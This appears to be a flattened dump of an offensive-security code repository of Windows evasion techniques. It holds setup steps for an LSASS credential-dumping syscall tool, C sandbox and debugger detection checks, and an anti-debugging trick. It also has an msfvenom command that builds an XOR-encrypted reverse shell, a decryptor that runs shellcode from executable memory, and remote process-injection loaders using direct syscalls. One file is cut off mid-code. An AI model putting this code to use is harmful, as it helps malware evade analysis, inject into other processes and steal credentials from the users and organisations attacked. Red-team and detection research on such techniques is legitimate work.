MASM (Assembly) Support** 12 | MASM is not enabled by default in C++ projects. Here’s how to configure it: 13 | 14 | 1. Right-click the **Solution** in the Solution Explorer and select **Add > New Project**. 15 | 2. Choose **Empty Project**. 16 | 3. Add the assembly file (`Lsasssyscall.asm`) to this project: 17 | - Right-click **Source Files** in the Solution Explorer. 18 | - Select **Add > Existing Item** and choose your `Lsasssyscall.asm` file. 19 | - Right click at the project name > Build Dependencies > Build Customizations > Enable MASM 20 | - Right click at the project name > properties > Linker > System > SubSystem : Console 21 | 22 | ### **4. Build the Project** 23 | 1. Set the build configuration to **Release** or **Debug** and **x64**. 24 | 2. Press **Ctrl+Shift+B** or go to **Build > Build Solution** to compile the project. 25 | 26 | 27 | ### **5. Run the Program** 28 | - Run the compiled executable (`LsassDumpSyscall.exe`) as an administrator. 29 | - Ensure the required privileges are enabled for the process (e.g., SE_DEBUG_NAME). 30 | 31 | More details: https://programminghaven.home.blog/2020/02/16/setup-an-assembly-project-on-visual-studio-2019/ 32 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/UTC_time_zone.c: -------------------------------------------------------------------------------- 1 | /* 2 | Checks if time zone is Coordinated Universal Time (UTC), C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include "Windows.h" 9 | #include "stdio.h" 10 | 11 | int main(int argc, char** argv[]) { 12 | TIME_ZONE_INFORMATION timeZone; 13 | DWORD ret = GetTimeZoneInformation(&timeZone); 14 | 15 | if (ret == TIME_ZONE_ID_INVALID) { 16 | printf("Unable to retrieve time zone informaiton, exiting.\n"); 17 | getchar(); 18 | exit(-1); 19 | } else { 20 | if (!wcscmp(L"Coordinated Universal Time", timeZone.DaylightName) || !wcscmp(L"Coordinated Universal Time", timeZone.StandardName)) { 21 | wprintf(L"The time zone is Coordinated Universal Time (UTC), do not proceed.\n"); 22 | } else { 23 | wprintf(L"The time zone is %s. Proceed!\n", timeZone.DaylightName); 24 | } 25 | } 26 | 27 | getchar(); 28 | return 0; 29 | 30 | } 31 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/check_all_DLL_names.c: -------------------------------------------------------------------------------- 1 | /* 2 | Checks all DLL names loaded by each process, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | #define numSandboxDLLs 7 13 | 14 | WCHAR* sandboxDLLs[numSandboxDLLs] = { L"sbiedll.dll", L"dbghelp.dll", L"api_log.dll", L"dir_watch.dll", L"pstorec.dll", L"vmcheck.dll", L"wpespy.dll" }; 15 | 16 | int main(void) { 17 | DWORD loadedProcesses[1024]; 18 | DWORD cbNeeded; 19 | DWORD cProcesses; 20 | unsigned int i; 21 | 22 | // Get all PIDs 23 | if (!EnumProcesses(loadedProcesses, sizeof(loadedProcesses), &cbNeeded)) { 24 | printf("[---] Could not get all PIDs, exiting.\n"); 25 | getchar(); 26 | exit(-1); 27 | } 28 | 29 | // Calculate how many PIDs returned 30 | cProcesses = cbNeeded / sizeof(DWORD); 31 | 32 | // Check all loaded DLLs 33 | HANDLE hProcess; 34 | int evidenceCount = 0; 35 | for (i = 0; i < cProcesses; i++) { 36 | HMODULE hMods[1024]; 37 | 38 | // Get a handle to the process. 39 | hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, loadedProcesses[i]); 40 | if (hProcess != NULL) { 41 | 42 | // Get a list of all the modules in this process. 43 | if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) { 44 | for (int i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) { 45 | TCHAR szModName[MAX_PATH]; 46 | // Get the full path to the module's file. 47 | if (GetModuleFileNameEx(hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(TCHAR))) { 48 | for (int j = 0; jBeingDebugged) { 17 | printf("A debugger is present, do not proceed."); 18 | } else { 19 | printf("No debugger is present. Proceed!"); 20 | } 21 | 22 | getchar(); 23 | return 0; 24 | 25 | } -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/filepath_existence.c: -------------------------------------------------------------------------------- 1 | /* 2 | Filepath existence checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include "Shlwapi.h" 12 | #pragma comment(lib, "Shlwapi.lib") 13 | 14 | #define numFiles 32 15 | 16 | int main(int argc, char **argv[]) { 17 | 18 | LPCWSTR filePaths[numFiles] = { L"C:\\windows\\Sysnative\\Drivers\\Vmmouse.sys", 19 | L"C:\\windows\\Sysnative\\Drivers\\vm3dgl.dll", L"C:\\windows\\Sysnative\\Drivers\\vmdum.dll", 20 | L"C:\\windows\\Sysnative\\Drivers\\vm3dver.dll", L"C:\\windows\\Sysnative\\Drivers\\vmtray.dll", 21 | L"C:\\windows\\Sysnative\\Drivers\\vmci.sys", L"C:\\windows\\Sysnative\\Drivers\\vmusbmouse.sys", 22 | L"C:\\windows\\Sysnative\\Drivers\\vmx_svga.sys", L"C:\\windows\\Sysnative\\Drivers\\vmxnet.sys", 23 | L"C:\\windows\\Sysnative\\Drivers\\VMToolsHook.dll", L"C:\\windows\\Sysnative\\Drivers\\vmhgfs.dll", 24 | L"C:\\windows\\Sysnative\\Drivers\\vmmousever.dll", L"C:\\windows\\Sysnative\\Drivers\\vmGuestLib.dll", 25 | L"C:\\windows\\Sysnative\\Drivers\\VmGuestLibJava.dll", L"C:\\windows\\Sysnative\\Drivers\\vmscsi.sys", 26 | L"C:\\windows\\Sysnative\\Drivers\\VBoxMouse.sys", L"C:\\windows\\Sysnative\\Drivers\\VBoxGuest.sys", 27 | L"C:\\windows\\Sysnative\\Drivers\\VBoxSF.sys", L"C:\\windows\\Sysnative\\Drivers\\VBoxVideo.sys", 28 | L"C:\\windows\\Sysnative\\vboxdisp.dll", L"C:\\windows\\Sysnative\\vboxhook.dll", 29 | L"C:\\windows\\Sysnative\\vboxmrxnp.dll", L"C:\\windows\\Sysnative\\vboxogl.dll", 30 | L"C:\\windows\\Sysnative\\vboxoglarrayspu.dll", L"C:\\windows\\Sysnative\\vboxoglcrutil.dll", 31 | L"C:\\windows\\Sysnative\\vboxoglerrorspu.dll", L"C:\\windows\\Sysnative\\vboxoglfeedbackspu.dll", 32 | L"C:\\windows\\Sysnative\\vboxoglpackspu.dll", L"C:\\windows\\Sysnative\\vboxoglpassthroughspu.dll", 33 | L"C:\\windows\\Sysnative\\vboxservice.exe", L"C:\\windows\\Sysnative\\vboxtray.exe", 34 | L"C:\\windows\\Sysnative\\VBoxControl.exe"}; 35 | 36 | 37 | int evidenceCount = 0; 38 | for (int i=0; i < numFiles; ++i) { 39 | if (PathFileExists(filePaths[i])) { 40 | wprintf(filePaths[i]); 41 | wprintf("\n"); 42 | ++evidenceCount; 43 | } 44 | } 45 | 46 | if (evidenceCount == 0) { 47 | printf("No files exist on disk that suggest we are running in a sandbox. Proceed!\n"); 48 | } 49 | 50 | getchar(); 51 | return 0; 52 | } 53 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/hostname.c: -------------------------------------------------------------------------------- 1 | /* 2 | Hostname checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int wmain(int agrc, wchar_t **argv[]) { 12 | 13 | WCHAR* computerName[3267]; 14 | DWORD charCount[3267]; 15 | 16 | if (!GetComputerNameW(&computerName, &charCount)) { 17 | printf("Could not read computer name, exiting.\n"); 18 | getchar(); 19 | exit(-1); 20 | } 21 | 22 | if (!wcsicmp(computerName, argv[1])) { 23 | printf("Proceed!\n"); 24 | } else { 25 | wprintf(L"Hostname: %s", computerName); 26 | } 27 | 28 | getchar(); 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/mac_address.c: -------------------------------------------------------------------------------- 1 | /* 2 | MAC address checker, C 3 | Most code taken from https://msdn.microsoft.com/en-us/library/windows/desktop/aa366062(v=vs.85).aspx 4 | Module written by Brandon Arvanaghi 5 | Website: arvanaghi.com 6 | Twitter: @arvanaghi 7 | */ 8 | 9 | #include 10 | #include 11 | #include 12 | #pragma comment(lib, "IPHLPAPI.lib") 13 | 14 | int main(int argc, char** argv[]) { 15 | boolean evidenceOfSandbox; 16 | PIP_ADAPTER_INFO pAdapterInfo; 17 | PIP_ADAPTER_INFO pAdapter = NULL; 18 | 19 | // First three bytes of known Virtual Machine MAC addresses (e.g. 00-0C-29...) 20 | unsigned char badMacAddresses[5][3] = { 21 | { 0x00, 0x0C, 0x29 }, 22 | { 0x00, 0x1C, 0x14 }, 23 | { 0x00, 0x50, 0x56 }, 24 | { 0x00, 0x05, 0x69 }, 25 | { 0x08, 0x00, 0x27 } 26 | }; 27 | 28 | ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO); 29 | pAdapterInfo = (IP_ADAPTER_INFO *)malloc(sizeof(IP_ADAPTER_INFO)); 30 | 31 | // Make an initial call to GetAdaptersInfo to get the necessary size into the ulOutBufLen variable 32 | if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW) { 33 | free(pAdapterInfo); 34 | pAdapterInfo = (IP_ADAPTER_INFO *)malloc(ulOutBufLen); 35 | } 36 | 37 | if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == NO_ERROR) { 38 | pAdapter = pAdapterInfo; 39 | while (pAdapter) { // for each adapter 40 | for (int i = 0; i < 5; ++i) { // check each row of bad MAC address table 41 | if (!memcmp(badMacAddresses[i], pAdapter->Address, 3)) { 42 | for (int j = 0; j < pAdapter->AddressLength; ++j) { 43 | if (j == (pAdapter->AddressLength - 1)) { 44 | printf("%.2X\n", (int)pAdapter->Address[j]); 45 | } else { 46 | printf("%.2X-", (int)pAdapter->Address[j]); 47 | } 48 | } 49 | evidenceOfSandbox = TRUE; 50 | } 51 | } 52 | 53 | pAdapter = pAdapter->Next; 54 | } 55 | } else { // GetAdaptersInfo failed 56 | printf("[---] GetAdaptersInfo failed, exiting.\n"); 57 | exit(-1); 58 | getchar(); 59 | } 60 | 61 | if (pAdapterInfo) { 62 | free(pAdapterInfo); 63 | } 64 | 65 | if (!evidenceOfSandbox) { 66 | printf("No MAC addresses match known virtual machine MAC addresses. Proceed!\n"); 67 | } 68 | 69 | getchar(); 70 | return 0; 71 | } 72 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/minimum_num_running_processes.c: -------------------------------------------------------------------------------- 1 | /* 2 | Ensures there are more than N processes currently running on the system (default: 50), C 3 | Ensures at least N processes running on the system (defaults to 50) 4 | Module written by Brandon Arvanaghi 5 | Website: arvanaghi.com 6 | Twitter: @arvanaghi 7 | */ 8 | 9 | #include 10 | #include 11 | #include 12 | 13 | int main(int argc, char **argv[]) { 14 | int minNumProcesses = 50; 15 | 16 | if (argc > 1) { 17 | minNumProcesses = atoi(argv[1]); 18 | } 19 | 20 | DWORD loadedProcesses[1024]; 21 | DWORD cbNeeded; 22 | DWORD runningProcesses; 23 | 24 | // Get all PIDs 25 | if (!EnumProcesses(loadedProcesses, sizeof(loadedProcesses), &cbNeeded)) { 26 | printf("[---] Could not get all PIDs, exiting.\n"); 27 | getchar(); 28 | exit(-1); 29 | } 30 | 31 | // Calculate how many PIDs returned 32 | runningProcesses = cbNeeded / sizeof(DWORD); 33 | 34 | if (runningProcesses >= minNumProcesses) { 35 | printf("There are %d processes running on the system, which satisfies the minimum you set of %d. Proceed!\n", runningProcesses, minNumProcesses); 36 | } else { 37 | printf("Only %d processes are running on the system, which is less than the minimum you set of %d. Do not proceed.\n", runningProcesses, minNumProcesses); 38 | } 39 | 40 | getchar(); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/prevent_debugging.c: -------------------------------------------------------------------------------- 1 | /* 2 | Prevents a debugger from attaching to this process after it has been loaded, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include "Windows.h" 9 | #include "Winternl.h" 10 | #include "stdio.h" 11 | 12 | int main(int argc, char **argv[]) { 13 | 14 | PPEB pPEB = (PPEB)__readfsdword(0x30); 15 | 16 | // Pretend process is already being debugged by setting PEB's BeingDebugged byte to 1 17 | // Only one debugger can attach to a process at a time. 18 | pPEB->BeingDebugged = 1; 19 | 20 | printf("The Process Environment Block's \"BeingDebugged\" field is set. Proceed!") 21 | 22 | getchar(); 23 | return 0; 24 | 25 | } -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/processors.c: -------------------------------------------------------------------------------- 1 | /* 2 | Minimum number of Processors, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int main(int argc, char **argv[]) { 12 | int minProcessors = 2; 13 | if (argc > 1) { 14 | minProcessors = atoi(argv[1]); 15 | } 16 | 17 | SYSTEM_INFO systemInfo; 18 | GetSystemInfo(&systemInfo); 19 | int numProcessors = systemInfo.dwNumberOfProcessors; 20 | 21 | if (numProcessors >= minProcessors) { 22 | printf("Number of processors: %d\n", numProcessors); 23 | printf("Proceed!\n"); 24 | } else { 25 | printf("Number of processors: %d\n", numProcessors); 26 | } 27 | 28 | getchar(); 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/processorsCount.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | SYSTEM_INFO info; 6 | ::GetNativeSystemInfo(&info); 7 | if (info.dwNumberOfProcessors < 2) 8 | { 9 | return -99; 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/ram.c: -------------------------------------------------------------------------------- 1 | /* 2 | Minimum number of browsers, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int main() { 12 | MEMORYSTATUSEX memStat; 13 | 14 | memStat.dwLength = sizeof(memStat); 15 | GlobalMemoryStatusEx(&memStat); 16 | 17 | if ((float)memStat.ullTotalPhys / 1073741824 > 1) { 18 | printf("The RAM of this host is at least 1 GB in size. Proceed!\n"); 19 | } else { 20 | printf("Less than 1 GB of RAM exists on this system. Do not proceed.\n"); 21 | } 22 | 23 | getchar(); 24 | return 0; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/registry.c: -------------------------------------------------------------------------------- 1 | /* 2 | Windows Registry key and value checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #pragma comment(lib, "Shlwapi.lib") 12 | 13 | int main() { 14 | HKEY hKey; 15 | int evidenceOfSandbox = 0; 16 | 17 | const char *sandboxStrings[5] = { "VMWare", "virtualbox", "vbox", "qemu", "xen" }; 18 | 19 | const char *HKLM_Keys_To_Check_Exist[7] = { "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\\Identifier", 20 | "SYSTEM\\CurrentControlSet\\Enum\\SCSI\\Disk&Ven_VMware_&Prod_VMware_Virtual_S", 21 | "SYSTEM\\CurrentControlSet\\Control\\CriticalDeviceDatabase\\root#vmwvmcihostdev", 22 | "SYSTEM\\CurrentControlSet\\Control\\VirtualDeviceDrivers", 23 | "SOFTWARE\\VMWare, Inc.\\VMWare Tools", 24 | "SOFTWARE\\Oracle\\VirtualBox Guest Additions", 25 | "HARDWARE\\ACPI\\DSDT\\VBOX_" }; 26 | 27 | const char *HKLM_Keys_With_Values_To_Parse[6][2] = { 28 | { "SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0" }, 29 | { "HARDWARE\\Description\\System", "SystemBiosInformation" }, 30 | { "HARDWARE\\Description\\System", "VideoBiosVersion" }, 31 | { "HARDWARE\\Description\\System\\BIOS", "SystemManufacturer" }, 32 | { "HARDWARE\\Description\\System\\BIOS", "SystemProductName" }, 33 | { "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0", "Logical Unit Id 0" } 34 | }; 35 | 36 | for (int i = 0; i < 7; ++i) { 37 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, HKLM_Keys_To_Check_Exist[i], 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 38 | printf("%s\n", HKLM_Keys_To_Check_Exist[i]); 39 | RegCloseKey(hKey); 40 | ++evidenceOfSandbox; 41 | } 42 | } 43 | 44 | for (int i = 0; i < 6; ++i) { 45 | HKEY hKey; 46 | TCHAR buff[1024] = { 0 }; 47 | DWORD buffSize = 1024; 48 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, HKLM_Keys_With_Values_To_Parse[i][0], 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 49 | if (RegQueryValueExA(hKey, HKLM_Keys_With_Values_To_Parse[i][1], NULL, NULL, (LPBYTE)buff, &buffSize) == ERROR_SUCCESS) { 50 | for (int j = 0; j < 5; ++j) { 51 | if (StrStrIA(buff, sandboxStrings[j]) != NULL) { 52 | printf("%s\\%s --> %s \n", HKLM_Keys_With_Values_To_Parse[i][0], HKLM_Keys_With_Values_To_Parse[i][1], buff); 53 | ++evidenceOfSandbox; 54 | } 55 | } 56 | } 57 | RegCloseKey(hKey); 58 | } 59 | } 60 | 61 | if (evidenceOfSandbox == 0) { 62 | printf("Proceed!\n"); 63 | } 64 | 65 | getchar(); 66 | 67 | return 0; 68 | } 69 | 70 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/usb.c: -------------------------------------------------------------------------------- 1 | /* 2 | Minimum number of USB devices ever mounted, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int main(int argc, char **argv[]) { 12 | HKEY hKey; 13 | // Baseline number of USBs ever mounted 14 | int MinimumUsbHistory = 2; 15 | // To store actual number of USBs ever mounted 16 | DWORD numUsbDevices = 0; 17 | 18 | // If user supplies a different baseline 19 | if (argc > 1) { 20 | MinimumUsbHistory = atoi(argv[1]); 21 | } 22 | 23 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Enum\\USBSTOR", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 24 | 25 | // Get number of subkeys, which corresponds to history of mounted USB devices 26 | if (RegQueryInfoKeyA(hKey, NULL, NULL, NULL, &numUsbDevices, NULL, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) { 27 | // Do nothing 28 | } else { 29 | printf("[---] Unable to query subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n"); 30 | getchar(); 31 | exit(-1); 32 | } 33 | } else { 34 | printf("[---] Unable to open subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n"); 35 | getchar(); 36 | exit(-1); 37 | } 38 | 39 | 40 | if (numUsbDevices >= MinimumUsbHistory) { 41 | printf("Number of USB devices ever mounted: %d\n", numUsbDevices); 42 | printf("Proceed!\n"); 43 | } else { 44 | printf("Number of USB devices ever mounted: %d\n", numUsbDevices); 45 | } 46 | 47 | getchar(); 48 | return 0; 49 | } 50 | 51 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/username.c: -------------------------------------------------------------------------------- 1 | /* 2 | Username checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int wmain(int agrc, wchar_t **argv[]) { 12 | 13 | WCHAR* username[3267]; 14 | DWORD charCount[3267]; 15 | 16 | if (!GetUserName(username, charCount)) { 17 | printf("Could not read username, exiting.\n"); 18 | getchar(); 19 | exit(-1); 20 | } 21 | 22 | if (!wcsicmp(username, argv[1])) { 23 | printf("Proceed!\n"); 24 | } else { 25 | wprintf(L"Username: %s", username); 26 | } 27 | 28 | getchar(); 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Evasion Techniques/Shellcode Encryption and Decryption/MSF_Xor_Encrypt.sh: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 --encrypt xor --encrypt-key test -f c -o enc.c -------------------------------------------------------------------------------- /Evasion Techniques/Shellcode Encryption and Decryption/Xor_Decrypt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[] = "xored_payload"; 5 | 6 | void x(char *payload, int payload_length, char *key, int length) { 7 | int j = 0; 8 | 9 | for (int i = 0; i < payload_length - 1; i++) { 10 | if (j == length - 1) j = 0; 11 | payload[i] ^= key[j]; 12 | unsigned char data = payload[i] ^ key[j]; 13 | j++; 14 | } 15 | } 16 | 17 | int main() 18 | { 19 | char key[] = "test"; 20 | x((char*)buf, sizeof(buf), key, sizeof(key)); 21 | 22 | //From here on out the shellcode is decrypted and can be executed 23 | void *exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 24 | memcpy(exec, buf, sizeof(buf)); 25 | ((void(*)())exec)(); 26 | } -------------------------------------------------------------------------------- /Evasion Techniques/Shellcode Encryption and Decryption/Xor_Encrypt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[] = "non encrypted payload"; 5 | 6 | void encrypt(char *payload, int payload_length, char *key, int length) { 7 | int j = 0; 8 | 9 | for (int i = 0; i < payload_length; i++) { 10 | if (j == length - 1) j = 0; 11 | payload[i] ^= key[j]; 12 | j++; 13 | } 14 | } 15 | 16 | int main() 17 | { 18 | char key[] = "test"; 19 | encrypt(buf, sizeof(buf), key, sizeof(key)); 20 | } -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/Direct Syscalls/DirectSyscalls.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Credit: https://github.com/JohnWoodman/stealthInjector 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | #include "getSyscall.h" 9 | 10 | #pragma comment(lib, "ntdll.lib") 11 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 12 | 13 | using myNtAllocateVirutalMemory = NTSTATUS(NTAPI*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect); 14 | 15 | using myNtWriteVirtualMemory = NTSTATUS(NTAPI*)(HANDLE ProcessHandle, LPVOID BaseAddress, char* Buffer, ULONG RegionSize, PULONG numBytesWritten); 16 | 17 | using myNtCreateThreadEx = NTSTATUS(NTAPI*)(PHANDLE hThread, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG Flags, SIZE_T ZeroBits, SIZE_T SizeOfStackCommit, SIZE_T SizeOfStackReserve, PVOID lpBytesBuffer); 18 | 19 | char buf[] = ""; 20 | 21 | int main(int argc, char *argv[]) { 22 | LPVOID allocation_start; 23 | STARTUPINFO si; 24 | PROCESS_INFORMATION pi; 25 | LPCSTR cmd; 26 | myNtAllocateVirutalMemory NtAllocateVirtualMemory; 27 | myNtWriteVirtualMemory NtWriteVirtualMemory; 28 | myNtCreateThreadEx NtCreateThreadEx; 29 | SIZE_T RegionSize = (SIZE_T)sizeof(buf); 30 | HANDLE hThread; 31 | HANDLE procHandle; 32 | 33 | char syscallStub_NtAlloc[SYSCALL_STUB_SIZE] = {}; 34 | char syscallStub_NtWrite[SYSCALL_STUB_SIZE] = {}; 35 | char syscallStub_NtCreate[SYSCALL_STUB_SIZE] = {}; 36 | DWORD oldProtection = 0; 37 | 38 | // define NtAllocateVirtualMemory 39 | NtAllocateVirtualMemory = (myNtAllocateVirutalMemory)(LPVOID)syscallStub_NtAlloc; 40 | VirtualProtect(syscallStub_NtAlloc, SYSCALL_STUB_SIZE, PAGE_EXECUTE_READWRITE, &oldProtection); 41 | 42 | // define NtWriteVirtualMemory 43 | NtWriteVirtualMemory = (myNtWriteVirtualMemory)(LPVOID)syscallStub_NtWrite; 44 | VirtualProtect(syscallStub_NtWrite, SYSCALL_STUB_SIZE, PAGE_EXECUTE_READWRITE, &oldProtection); 45 | 46 | // define NtCreateThreadEx 47 | NtCreateThreadEx = (myNtCreateThreadEx)(LPVOID)syscallStub_NtCreate; 48 | VirtualProtect(syscallStub_NtCreate, SYSCALL_STUB_SIZE, PAGE_EXECUTE_READWRITE, &oldProtection); 49 | 50 | // get syscall stubs 51 | GetSyscallStub("NtAllocateVirtualMemory", syscallStub_NtAlloc); 52 | GetSyscallStub("NtWriteVirtualMemory", syscallStub_NtWrite); 53 | GetSyscallStub("NtCreateThreadEx", syscallStub_NtCreate); 54 | 55 | allocation_start = nullptr; 56 | 57 | printf("[*] Injecting into remote process using direct syscalls\n\n"); 58 | 59 | procHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4568); 60 | NtAllocateVirtualMemory(procHandle, &allocation_start, 0, (PULONG)&RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 61 | NtWriteVirtualMemory(procHandle, allocation_start, buf, sizeof(buf), 0); 62 | NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, procHandle, allocation_start, allocation_start, FALSE, NULL, NULL, NULL, NULL); 63 | 64 | } 65 | -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/Direct Syscalls/NtOpenProcess.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Based on 3 | https://cocomelonc.github.io/tutorial/2021/12/11/malware-injection-11.html 4 | */ 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "ntdll") 11 | 12 | #define InitializeObjectAttributes(p,n,a,r,s) { \ 13 | (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ 14 | (p)->RootDirectory = (r); \ 15 | (p)->Attributes = (a); \ 16 | (p)->ObjectName = (n); \ 17 | (p)->SecurityDescriptor = (s); \ 18 | (p)->SecurityQualityOfService = NULL; \ 19 | } 20 | 21 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)( 22 | HANDLE ProcessHandle, 23 | PVOID *BaseAddress, 24 | ULONG ZeroBits, 25 | PULONG RegionSize, 26 | ULONG AllocationType, 27 | ULONG Protect 28 | ); 29 | 30 | // dt nt!_UNICODE_STRING 31 | typedef struct _UNICODE_STRING 32 | { 33 | USHORT Length; 34 | USHORT MaximumLength; 35 | PWSTR Buffer; 36 | } UNICODE_STRING, *PUNICODE_STRING; 37 | 38 | // dt nt!_OBJECT_ATTRIBUTES 39 | typedef struct _OBJECT_ATTRIBUTES { 40 | ULONG Length; 41 | HANDLE RootDirectory; 42 | PUNICODE_STRING ObjectName; 43 | ULONG Attributes; 44 | PVOID SecurityDescriptor; 45 | PVOID SecurityQualityOfService; 46 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 47 | 48 | // dt nt!_CLIENT_ID 49 | typedef struct _CLIENT_ID { 50 | PVOID UniqueProcess; 51 | PVOID UniqueThread; 52 | } CLIENT_ID, *PCLIENT_ID; 53 | 54 | typedef NTSTATUS(NTAPI* pNtOpenProcess)( 55 | PHANDLE ProcessHandle, 56 | ACCESS_MASK AccessMask, 57 | POBJECT_ATTRIBUTES ObjectAttributes, 58 | PCLIENT_ID ClientID 59 | ); 60 | 61 | 62 | unsigned char buf[] = ""; 63 | 64 | int main(int argc, char* argv[]) { 65 | HANDLE ph; // process handle 66 | HANDLE rt; // remote thread 67 | PVOID rb; // remote buffer 68 | DWORD pid; // process ID 69 | 70 | pid = atoi(argv[1]); 71 | OBJECT_ATTRIBUTES oa; 72 | 73 | CLIENT_ID cid; 74 | 75 | InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL); 76 | cid.UniqueProcess = (PVOID)pid; 77 | cid.UniqueThread = 0; 78 | 79 | // loading ntdll.dll 80 | HMODULE ntdll = GetModuleHandleA("ntdll"); 81 | printf("PID: %i", pid); 82 | 83 | pNtOpenProcess myNtOpenProcess = (pNtOpenProcess)GetProcAddress(ntdll, "NtOpenProcess"); 84 | 85 | pNtAllocateVirtualMemory myNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(ntdll, "NtAllocateVirtualMemory"); 86 | 87 | // open remote proces via NT API 88 | myNtOpenProcess(&ph, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, &oa, &cid); 89 | 90 | if (!ph) { 91 | printf("failed to open process :(\n"); 92 | return -2; 93 | } 94 | 95 | PVOID va = VirtualAllocEx(ph, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 96 | WriteProcessMemory(ph, va, buf, sizeof buf, NULL); 97 | HANDLE h_thread = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)va, NULL, 0, NULL); 98 | return 0; 99 | } -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/Direct Syscalls/getSyscall.h: -------------------------------------------------------------------------------- 1 | /* 2 | Credit: https://github.com/JohnWoodman/stealthInjector 3 | */ 4 | 5 | #pragma once 6 | #include 7 | #include "windows.h" 8 | #include "winternl.h" 9 | #pragma comment(lib, "ntdll") 10 | 11 | int const SYSCALL_STUB_SIZE = 23; 12 | 13 | 